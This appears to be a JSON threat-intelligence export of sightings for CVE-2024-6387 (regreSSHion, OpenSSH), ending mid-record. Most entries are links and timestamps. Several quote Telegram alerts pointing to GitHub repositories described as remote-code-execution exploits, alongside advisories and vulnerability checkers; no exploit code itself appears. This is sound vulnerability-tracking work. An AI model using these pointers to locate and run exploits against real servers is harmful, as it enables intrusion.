{"vulnerability": "CVE-2024-6387", "sightings": [{"uuid": "5a1bf123-90e7-42fd-8386-08824c4f72ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "8ef3179e-6ae2-42ba-9d27-75d713d75f20", "vulnerability": "CVE-2024-6387", "type": "seen", "source": null, "content": "", "creation_timestamp": "2024-10-18T12:32:41.317679Z"}, {"uuid": "cb77c7c0-ec29-42be-9103-d2abddc73c94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/elhackernet.extwitter.link/post/3lf5szotmck26", "content": "", "creation_timestamp": "2025-01-07T14:06:13.256814Z"}, {"uuid": "12323dc2-14b3-466e-aefd-e1017cf6fb76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/anders-olsson.bsky.social/post/3lfeumlalzk2w", "content": "", "creation_timestamp": "2025-01-10T09:23:19.751412Z"}, {"uuid": "237e90f9-6caf-4e7f-9978-ade58025bbd7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/pauldokas.bsky.social/post/3lf4comwbpk2d", "content": "", "creation_timestamp": "2025-01-06T23:41:04.797381Z"}, {"uuid": "4b53d33f-ec3b-44a1-85f8-c858685f8dd1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/timb-machine.infosec.exchange.ap.brid.gy/post/3lf33nbjb23w2", "content": "", "creation_timestamp": "2025-01-06T12:03:15.345666Z"}, {"uuid": "95e71b02-a20d-4fdc-bb93-1331306af5eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/blackasphodel.bsky.social/post/3lfcwp542es2d", "content": "", "creation_timestamp": "2025-01-09T14:55:13.922634Z"}, {"uuid": "9b9c6347-8c26-4c16-9a05-f288522d590c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/decrypt.lol/post/3lg7jxu7hlg2w", "content": "", "creation_timestamp": "2025-01-20T23:54:38.912747Z"}, {"uuid": "7e2488d8-0cb9-4ba3-97bd-b87e8692ef19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/tuxcare.bsky.social/post/3lgbnkqxlhc2f", "content": "", "creation_timestamp": "2025-01-21T20:04:14.225562Z"}, {"uuid": "be65d5b3-7c70-4b7c-a588-f70b2a67b40d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://infosec.exchange/users/dragonjar/statuses/113962259181360934", "content": "", "creation_timestamp": "2025-02-07T11:01:15.749327Z"}, {"uuid": "bdd69821-2577-44b2-8970-dfddfbff6704", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-100-09", "content": "", "creation_timestamp": "2025-04-10T10:00:00.000000Z"}, {"uuid": "3e9af1ca-6b22-4460-a92f-c8c5131e9198", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-162-05", "content": "", "creation_timestamp": "2025-06-12T10:00:00.000000Z"}, {"uuid": "13692462-0e97-4381-9eb3-c36d7037e014", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/qualysofficial.bsky.social/post/3lvywrhkvtc2v", "content": "", "creation_timestamp": "2025-08-09T23:38:10.693646Z"}, {"uuid": "f0236db0-ea7a-49e4-adda-91f23a527d6b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3lnj3phaqu62x", "content": "", "creation_timestamp": "2025-04-23T21:02:25.937278Z"}, {"uuid": "2a5654bf-a360-4f5e-a308-fad4c0484401", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://bsky.app/profile/cyberhub.blog/post/3lpoia4xjoq2z", "content": "", "creation_timestamp": "2025-05-21T11:20:08.881056Z"}, {"uuid": "b3a8d4cf-67e1-424d-beef-835599b43ca0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://gist.github.com/rcy/48e679544bf1de403b110aa208fb64b0", "content": "", "creation_timestamp": "2025-07-19T21:19:23.000000Z"}, {"uuid": "37b2d43b-09d5-4a7e-9096-a09cbf4d2c70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/bluesky.awakari.com/post/3lshkcjb5a22n", "content": "", "creation_timestamp": "2025-06-25T21:24:13.234990Z"}, {"uuid": "1904fdf9-68f6-4634-8122-5e2209aec9bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3lzj43ntdas2y", "content": "", "creation_timestamp": "2025-09-23T14:11:33.991632Z"}, {"uuid": "fcf68e94-b0d1-4e26-866b-e4587afe7e22", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3lzgf2xxsry2r", "content": "", "creation_timestamp": "2025-09-22T12:14:13.318874Z"}, {"uuid": "ef15a23a-a448-40ff-9eb0-94000e41a209", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "MISP/3445a876-cced-4346-bf37-e276ba39cff4", "content": "", "creation_timestamp": "2025-09-02T18:30:14.000000Z"}, {"uuid": "3d18f7a9-77af-471d-b123-b072b6d8f037", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfw37et3jr2m", "content": "", "creation_timestamp": "2026-02-28T11:02:39.831428Z"}, {"uuid": "bbaedb96-18a1-40a1-accd-34f07f30ad3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-63874", "type": "seen", "source": "https://bsky.app/profile/ferramentaslinux.bsky.social/post/3lztctehpek2a", "content": "", "creation_timestamp": "2025-09-27T15:38:49.151203Z"}, {"uuid": "f4399567-1e03-458f-83d0-1e84f0cb6cd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1321", "content": "", "creation_timestamp": "2024-07-02T04:00:00.000000Z"}, {"uuid": "807ae797-a14c-4dee-969c-48e63be6bbfc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mfw2bxbccf2d", "content": "", "creation_timestamp": "2026-02-28T10:46:11.927057Z"}, {"uuid": "e0a2bf4c-8878-45e9-b022-173a9e212b35", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mgg3fi7mfo2q", "content": "", "creation_timestamp": "2026-03-06T19:48:39.887557Z"}, {"uuid": "e04cc343-06a2-4e63-89aa-558ca81ec640", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://vulnerability.circl.lu/comment/c83a5095-cd84-42e7-858b-3979ae75e818", "content": "", "creation_timestamp": "2024-07-07T06:21:50.543465Z"}, {"uuid": "053e0e78-fd86-4064-b773-87b9619d65d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mg6kr472ru26", "content": "", "creation_timestamp": "2026-03-03T20:02:17.899861Z"}, {"uuid": "41e836a9-5e1a-4c73-97f8-d2c4a7a38089", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://poliverso.org/objects/0477a01e-b719cfbf-8634aa78376c4ba2", "content": "", "creation_timestamp": "2025-12-23T12:48:54.170345Z"}, {"uuid": "3f8009ad-c959-47b8-9af7-6959cfb81468", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/getter-io/dc2c189a44aff96d462f5113d6def33a", "content": "", "creation_timestamp": "2025-12-27T16:55:44.000000Z"}, {"uuid": "b5e0f34c-209e-4afb-a25f-5d8ef0fa94e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mbgvlhfff62a", "content": "", "creation_timestamp": "2026-01-02T12:31:28.709799Z"}, {"uuid": "418aac2f-42a1-486e-997c-3de778bdfb5a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_17/2024", "content": "", "creation_timestamp": "2024-07-01T10:07:39.000000Z"}, {"uuid": "43dcd08f-89ba-4f3a-9e4c-7a75c98fb953", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/e5191d0cc29d397f10ca42ac62a61e33", "content": "", "creation_timestamp": "2026-01-24T21:31:08.000000Z"}, {"uuid": "981abe31-b405-4fcf-b904-5bd306fef90b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/54bc3493bd67da9a0c6902a92d4656a8", "content": "", "creation_timestamp": "2026-01-24T21:22:50.000000Z"}, {"uuid": "32b95332-dfa5-4a83-a6c9-08401bf5d689", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=1332", "content": "", "creation_timestamp": "2024-07-16T04:00:00.000000Z"}, {"uuid": "3c2754be-1e45-4346-ba5a-37054e785598", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/521ac082eaac9ab50bfae049fe633e73", "content": "", "creation_timestamp": "2026-01-24T21:31:07.000000Z"}, {"uuid": "49176c51-ce4b-466e-be98-447fbad96be1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/30bfd75b05bc46aa1a538f9e198a7b60", "content": "", "creation_timestamp": "2026-01-24T21:30:51.000000Z"}, {"uuid": "a33e044a-4d33-454b-b35a-fd521fffd914", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/550664197a4fb5b0fbbe5f8fba27fabb", "content": "", "creation_timestamp": "2026-01-24T21:30:50.000000Z"}, {"uuid": "40f6bab7-f1aa-453f-8872-19227e5a7305", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/51813a85466530a06da842c15454ce27", "content": "", "creation_timestamp": "2026-01-24T21:30:48.000000Z"}, {"uuid": "93f5d7b5-bfca-44c5-bfc7-17a68d451331", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/c36c39e2b247830ff6250b2ce201866e", "content": "", "creation_timestamp": "2026-01-24T21:30:48.000000Z"}, {"uuid": "e9648b05-53b3-4293-9c0c-43ec3e3aa048", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/c2b5d108d0b2c4cdd16f9174133b2e40", "content": "", "creation_timestamp": "2026-01-24T21:30:45.000000Z"}, {"uuid": "0c74cff4-d4e9-4e7d-ba13-bc73322dcab1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/ccae86fb73ee8738a2887b80dcfa8185", "content": "", "creation_timestamp": "2026-01-24T21:30:44.000000Z"}, {"uuid": "a33c3ca1-f765-421f-aaa0-e210a208be05", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/a497cb88f008a195a6f49e41ea50d734", "content": "", "creation_timestamp": "2026-01-24T22:18:42.000000Z"}, {"uuid": "45caa050-1d94-4d2a-9bfa-e72ecd0ed92c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/5dd7db76b92ddfc605577925dbd7302a", "content": "", "creation_timestamp": "2026-01-24T22:18:39.000000Z"}, {"uuid": "44ed56e7-a71b-47e2-8cfe-d65bc717c530", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://bsky.app/profile/glitterbean.wehavecookies.social.ap.brid.gy/post/3mhyvi74jqx72", "content": "", "creation_timestamp": "2026-03-27T00:48:44.053217Z"}, {"uuid": "f8c4b271-9e66-413a-bf66-0618a91a7e46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/13c0ac15bc21424a2c7893c086aad954", "content": "", "creation_timestamp": "2026-01-24T22:42:50.000000Z"}, {"uuid": "fa18360a-db8d-4e8f-889f-b4eaecd06b90", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/6a9c8f2cd74737842a4c6788a69cddd1", "content": "", "creation_timestamp": "2026-01-24T22:42:49.000000Z"}, {"uuid": "39842fe1-e7ba-4bf0-b2c8-fd66872c529b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/b128d27555414726258a53d6027898de", "content": "", "creation_timestamp": "2026-01-24T22:42:46.000000Z"}, {"uuid": "bb7f7b54-6ed6-451a-8c62-f3ecca16366e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7835", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPoC - Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387) \nURL\uff1ahttps://github.com/l0n3m4n/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T18:34:59.000000Z"}, {"uuid": "39adea9f-ef16-470d-a81b-b69772ca2e4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/63a30e75c2295e9de4ee59aeaa0e8110", "content": "", "creation_timestamp": "2026-01-24T22:44:00.000000Z"}, {"uuid": "78caa3fd-8b31-4981-8437-fcf90a4b27e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://gist.github.com/alon710/c7db84d9a8d4561ea49f5152eb9477e6", "content": "", "creation_timestamp": "2026-01-24T22:43:59.000000Z"}, {"uuid": "888c2311-8bfe-431b-87e0-f02523283f65", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://censys.com/blog/under-ctrl-dissecting-a-previously-undocumented-russian-net-access-framework/", "content": "", "creation_timestamp": "2026-03-31T02:00:10.000000Z"}, {"uuid": "52e75ec6-7694-4e74-8e64-577d5a17b89e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7844", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aSSH Exploit for CVE-2024-6387 (regreSSHion)\nURL\uff1ahttps://github.com/Symbolexe/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-03T08:57:38.000000Z"}, {"uuid": "b774387f-3749-457b-90b0-1e7f8a81904c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7836", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387-Check is a streamlined and efficient tool created to detect servers operating on vulnerable versions of OpenSSH.\nURL\uff1ahttps://github.com/RickGeex/CVE-2024-6387-Checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T18:51:27.000000Z"}, {"uuid": "c4fb604f-b6fd-48da-82b4-02729fb7180e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7857", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387-OpenSSH-Vulnerability-Checker\nURL\uff1ahttps://github.com/turbobit/CVE-2024-6387-OpenSSH-Vulnerability-Checker\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-04T03:58:12.000000Z"}, {"uuid": "1b11e54a-0bdf-4d0d-9758-c1b46cf3cb4d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7856", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387_Check \u662f\u4e00\u6b3e\u8f7b\u91cf\u7ea7\u3001\u9ad8\u6548\u7684\u5de5\u5177\uff0c\u65e8\u5728\u8bc6\u522b\u8fd0\u884c\u6613\u53d7\u653b\u51fb\u7684 OpenSSH \u7248\u672c\u7684\u670d\u52a1\u5668\uff0c\u4e13\u95e8\u9488\u5bf9\u6700\u8fd1\u53d1\u73b0\u7684regreSSHion\u6f0f\u6d1e (CVE-2024-6387)\u3002\u6b64\u811a\u672c\u6709\u52a9\u4e8e\u5feb\u901f\u626b\u63cf\u591a\u4e2a IP \u5730\u5740\u3001\u57df\u540d\u548c CIDR \u7f51\u7edc\u8303\u56f4\uff0c\u4ee5\u68c0\u6d4b\u6f5c\u5728\u6f0f\u6d1e\u5e76\u786e\u4fdd\u60a8\u7684\u57fa\u7840\u8bbe\u65bd\u5b89\u5168\u3002\nURL\uff1ahttps://github.com/JackSparrowhk/ssh-CVE-2024-6387-poc\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-04T03:54:02.000000Z"}, {"uuid": "6a7c086a-7b04-4e74-8f7b-90447d9117c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7869", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aHASSH fingerprints for identifying OpenSSH servers potentially vulnerable to CVE-2024-6387 (regreSSHion).\nURL\uff1ahttps://github.com/0x4D31/cve-2024-6387_hassh\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-05T03:45:55.000000Z"}, {"uuid": "ce4caa4f-4af3-41fc-b66c-5cf7795d5f8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7868", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aProvides instructions for using the script to check if your OpenSSH installation is vulnerable to CVE-2024-6387\nURL\uff1ahttps://github.com/invaderslabs/regreSSHion-CVE-2024-6387-\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-04T22:26:01.000000Z"}, {"uuid": "978adfaa-2aa6-4e61-9866-4bde0b12d7b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7866", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1arewrited SSH Exploit for CVE-2024-6387 (regreSSHion)\nURL\uff1ahttps://github.com/4lxprime/regreSSHive\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-04T14:39:33.000000Z"}, {"uuid": "6ecaa983-ffc4-4872-985d-787fdb67fda3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7825", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aPrivate x64 RCE exploit for CVE-2024-6387 [02.07.2024] from exploit.in\nURL\uff1ahttps://github.com/PrincipalAnthony/CVE-2024-6387-Updated-x64bit\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T09:47:46.000000Z"}, {"uuid": "8bb9b8f8-b80a-4e5a-bda1-bb1cc3c94b33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7804", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-6387 for SSH RCE in Python [Update]\nURL\uff1ahttps://github.com/TrustResearcher/CVE-2024-6387-Updated-SSH-RCE\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-01T18:34:24.000000Z"}, {"uuid": "6f2a734d-a7a5-4b0c-829b-1555cf631509", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7820", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aThis Python script exploits a remote code execution vulnerability (CVE-2024-6387) in OpenSSH.\nURL\uff1ahttps://github.com/d0rb/CVE-2024-6387\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-07-02T07:00:18.000000Z"}, {"uuid": "b04ba25b-043e-4ef7-9c9b-e7e3f6b796c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-6387", "type": "seen", "source": "https://t.me/GithubRedTeam/7828", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aMitigation Guide for CVE-2024-6387 in 